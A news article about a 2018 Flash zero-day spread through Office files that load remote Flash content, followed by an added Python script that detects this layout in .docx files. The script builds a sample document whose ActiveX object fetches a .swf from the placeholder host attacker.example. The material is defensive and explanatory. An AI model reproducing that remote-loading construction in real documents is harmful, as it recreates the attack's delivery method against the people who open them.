Browsers have become too hardened, so hackers turn to embedding zero-day Flash exploits in Microsoft Office files
Unable to get at Flash through the browser any longer, attackers are switching to Office files; the most recent case involved hackers targeting diplomats in the Middle East.
Because exploiting vulnerabilities in Adobe Flash and other browser plugins has become increasingly difficult, attackers have begun moving to Microsoft Office documents that load Flash content from a remote server and then use a zero-day vulnerability to take control of the computer.
On Thursday, Adobe released a patch for a critical vulnerability, CVE-2018-5002. The bug is a buffer overflow triggered by an Office file containing an embedded link to a Flash file hosted on people.dohabayt.com. When opened, the infected file downloads the malicious payload from that domain. That is the assessment of researchers at Icebrg and Qihoo 360, who discovered the flaw and reported it to Adobe independently.
Over the past few years, browsers have begun blocking Flash content by default to prevent drive-by attacks (exploits served from malicious websites) that target vulnerabilities in Adobe's widely used player. However, some versions of Microsoft Office still load Flash, even though it is rarely if ever used there, Icebrg CEO William Peteroy said. To avoid this, users should make sure Flash is prevented from loading when it is installed, or is set to ask before loading.
'Adobe Flash Player loaded from the Microsoft Store is a popular way to exploit Flash, because Flash has been disabled in browsers,' Icebrg researchers said. Usually the Flash file is embedded in the document itself, so that it is not detected by antivirus software. 'Unlike the usual tactics, this type of attack uses lesser-known features, fetching remote Flash content instead of embedding it directly in the document. Only the XML packages for the Flash Player ActiveX and OLE Object are chosen, which reveals the new parameters.'
Examples of remote Flash objects embedded in Office documents
Because this attack leaves the document itself without any exploit code, it is much harder to detect. Loading the exploit remotely also lets the attacker serve the vulnerability only to predefined IP addresses rather than to anyone who opens the document, which makes it easier to stay hidden for long periods.
For years, security researchers have advised users to remove stand-alone Flash applications and rely on the browser's default blocking of Flash content. Following this incident, you should also block Flash content in documents, especially those from untrusted sources. If you still use Flash, make sure you are running the latest version, 30.0.0.113, which can be downloaded here: https://get.adobe.com/flashplayer/
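As an added example that is not part of the original article or the researchers' work, the following triage script checks a .docx for the layout described above: an ActiveX/OLE object that refers to the Flash Player control and pulls its content from an external URL rather than carrying it inside the file. The sample document is constructed in memory, and the hostname attacker.example is a placeholder, not the domain named in the article.

```python
# Added example: OOXML triage for remotely loaded Flash objects in a .docx.
# Walks every XML/.rels part of the zip and reports (1) references to the
# Shockwave Flash ActiveX CLSID, (2) ActiveX property values that are URLs,
# and (3) relationships whose Target is an external http(s) resource.
import io
import re
import zipfile
from typing import List

FLASH_CLSID = "D27CDB6E-AE6D-11CF-96B8-444553540000"  # public Flash ActiveX CLSID
OCX_URL = re.compile(r'ax:value="(https?://[^"]+)"', re.I)
EXTERNAL_REL = re.compile(
    r'TargetMode="External"[^>]*Target="(https?://[^"]+)"|'
    r'Target="(https?://[^"]+)"[^>]*TargetMode="External"', re.I)

def find_remote_flash(docx_bytes: bytes) -> List[str]:
    """Return one finding string per suspicious indicator found in the document."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith((".xml", ".rels")):
                continue
            data = zf.read(name).decode("utf-8", "replace")
            if FLASH_CLSID.lower() in data.lower():
                findings.append(f"{name}: Flash Player ActiveX CLSID referenced")
            for m in OCX_URL.finditer(data):
                findings.append(f"{name}: remote ActiveX property value {m.group(1)}")
            for m in EXTERNAL_REL.finditer(data):
                findings.append(f"{name}: external target {m.group(1) or m.group(2)}")
    return findings

def build_sample_docx() -> bytes:
    """Constructed minimal document mimicking the remote-Flash layout (placeholder host, no payload)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document><w:object/></w:document>")
        zf.writestr("word/activeX/activeX1.xml",
                    f'<ax:ocx ax:classid="{{{FLASH_CLSID}}}" ax:persistence="persistPropertyBag">'
                    '<ax:ocxPr ax:name="Movie" ax:value="http://attacker.example/placeholder.swf"/></ax:ocx>')
        zf.writestr("word/activeX/_rels/activeX1.xml.rels",
                    '<Relationships><Relationship Id="rId1" Type="oleObject" '
                    'Target="http://attacker.example/placeholder.swf" TargetMode="External"/></Relationships>')
    return buf.getvalue()

if __name__ == "__main__":
    for line in find_remote_flash(build_sample_docx()):
        print(line)
```

A document whose Flash object is fully embedded produces only the CLSID finding; the combination of the CLSID with an external target is what distinguishes the remote-loading variant described here.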